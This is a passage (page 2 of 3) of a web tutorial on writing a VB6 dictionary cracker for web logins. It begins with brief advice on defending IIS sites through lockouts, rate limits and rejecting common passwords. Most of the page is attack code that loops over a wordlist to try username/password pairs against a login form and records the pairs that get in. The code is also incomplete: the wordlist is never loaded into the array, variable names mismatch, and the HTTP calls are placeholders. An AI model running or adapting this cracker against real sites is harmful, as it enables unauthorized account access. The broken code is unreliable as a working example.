Extranet/Intranet Dictionary Cracker in VB - Building the Cracker (Page 2 of 3 )
The important elements of conducting a dictionary attack are 1) sending multiple UID/PW combinations, 2) the rate of sending UID/PW combinations, and 3) the ‘Commonness’ of the UID/PW words. To defend against a dictionary attack, simply address any one of the elements above and the defending site will be significantly strengthened (disclaimer.h).
In each element below, the defending server is an MS IIS Server; however, the concept arguments can be applied to any server.
To defend against multiple UID/PW combinations, use the Session variable to track 3 incorrect access attempts. On the next attempt within the Session automatically refuse access. In fact, even the correct UID/PW will be rejected in this scenario. When the Session times-out, the system resets and the user can again gain access with the correct UID/PW.
The ‘rate’ of sending UID/PW addresses the number of attempts to login within a given period of time. After a user has failed 3 times, code the application to refuse login attempts for the next hour. The dictionary attack is dead as it would take ~ 6.8 YEARS to use the smallest 100 word library.
‘Common’ words: need I say more? To force users to use uncommon words or random characters, generate passwords for users. I don’t like that method, so I take new passwords and compared them against a word library. If the submitted PW is in the library then a different one is requested.
The VB6 code below is compiled into a simple .exe that takes parameters such as site address, UID and PW.
Using a coma delimited .txt file of common words, the program sets a matrix of possible UID/PW combinations and sends them to the site for verification. The remote server’s response is analyzed to determine if access was granted. When the program is finished, a MsgBox is displayed with the UID/PW that were granted access.
Public Function getDictionary(ByVal strURL As String,_ ByVal strMethod As String, ByVal strForm As String, _ ByVal strMatchNoEntry As String, ByVal UidLimitLen As Integer) As String Dim mHTTP As Object, aryDictionary() As String Dim fso As Object, TextStream As Object, S As String, ApplicationPath As String ApplicationPath = App.Path & "\" Set fso = CreateObject("Scripting.FileSystemObject") Set TextStream = fso.OpenTextFile(ApplicationPath & "wordlist.txt", 1) S = S & TextStream.ReadAll TextStream.Close DoEvents getDictionary = getDictionaryAccess(strForm, UidLimitLen, oHTTP, strMatchNoEntry, aryDictionary) End Function
Private Function getDictionaryAccess(ByVal Params As String, ByVal iSections As Integer,_ ByRef mHTTP As Object, ByVal strMatchNoEntry As String,_ ByRef aryDictionary() As String) As String 'Returns ";" delimited string of params 'assumes two params of username and password, the exact name value are passed in 'getDictionaryAccess = "uid=matt&pwd=1;uid=matt&pwd=2;10006=DTM&10007=1999" 'this guy will go 1, 2 and 3 characters against the Dictionary, then Dictionary against Dictionary 'the random attack does the 1 to 3 uid and pw matrix Dim aryParams As Variant, strTemp As String, aryTemp() As String Dim uid As Integer, pw As Integer, strResponse As String, strSomeAccessPoints As String iSections = iSections + 1 'iSecitons allows control of word lenght On Error Resume Next For uid = 0 To UBound(aryDictionary) For pw = 0 To UBound(aryDictionary) If (Len(aryDictionary(uid)) < iSections) And (Len(aryDictionary(pw)) < iSections) Then getDictionaryAccess = aryParams(0) & "=" & aryDictionary(uid) & "&" & _ aryParams(1) & "=" & aryDictionary(pw) mHTTP engine method call Call IMWaiting(mHTTP) strResponse = mHTTP engine data retrieval Call IMWaiting(mHTTP) strResponse = Replace(strResponse, Chr(13), ";") If (strResponse <> "") Then If Not CBool(InStr(CStr(strResponse), CStr(strMatchNoEntry)) > 0) Then 'strSomeAccessPoints has the params that GRANTED ACCESS strSomeAccessPoints = strSomeAccessPoints & aryDictionary(uid) & "," & aryDictionary(pw) & ";" End If End If strResponse = "" DoEvents End If Next Next On Error GoTo 0 getDictionaryAccess = strSomeAccessPoints End Function